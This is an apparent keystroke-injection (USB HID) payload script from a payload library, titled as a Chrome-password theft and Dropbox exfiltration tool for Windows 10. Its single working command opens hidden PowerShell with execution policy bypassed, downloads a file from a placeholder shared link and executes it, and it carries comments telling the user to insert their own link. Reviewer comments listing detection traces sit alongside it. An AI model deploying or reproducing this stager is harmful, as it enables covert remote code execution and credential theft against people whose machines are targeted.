Path: blob/master/payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/Version 01/payload.txt
REM #########################################################################################################
REM # Title       : Browser-Passwords-Dropbox-Exfiltration
REM # Author      : DIYS.py
REM # Version     : 1.0
REM # Category    : Credentials, Exfiltration
REM # Target      : Windows 10 (PowerShell + Chrome)
REM # Mode        : HID
REM # Props       : I am Jakoby, NULLSESSION0X
REM # Description : Opens PowerShell hidden, grabs Chrome
REM #               passwords, saves as a cleartext file and
REM #               exfiltrates info via Dropbox.
REM #               Then it cleans up traces of what you have done
REM #               after.
REM #########################################################################################################
REM
REM Reviewer notes: this file is only a stager. The one STRINGLN line below downloads a
REM second file and runs it; the Chrome collection, Dropbox upload and cleanup named in
REM the description are not in this file and presumably live in that downloaded file.
REM What the keystrokes leave for a defender to look for:
REM   - powershell.exe started from the Run dialog with -w h -NoP -NonI -Exec Bypass
REM     (hidden window, no profile, non-interactive, execution policy bypassed).
REM   - iwr (Invoke-WebRequest) output handed straight to invoke-expression, i.e. remote
REM     content executed without being written to disk by this line.
REM   - Process-creation auditing with command lines (Security event 4688) and PowerShell
REM     script block logging (event 4104) record the command and the fetched script text.
REM   - The typed command is also kept in the user's Run dialog history (RunMRU) unless
REM     something removes it afterwards.
REM   - A new USB keyboard appearing a few seconds before the command is typed.

REM Present the device to the host as a USB keyboard only.
ATTACKMODE HID

REM Wait 3000 ms after plug-in before typing.
DELAY 3000
REM Windows key + R: opens the Run dialog.
GUI r
REM Wait 250 ms for the dialog to take focus.
DELAY 250
REM Type the command and press Enter. $pl holds the iwr response for the placeholder
REM link; invoke-expression then executes it in the hidden PowerShell session.
STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://< Your Shared link for the intended file>?dl=1; invoke-expression $pl

REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly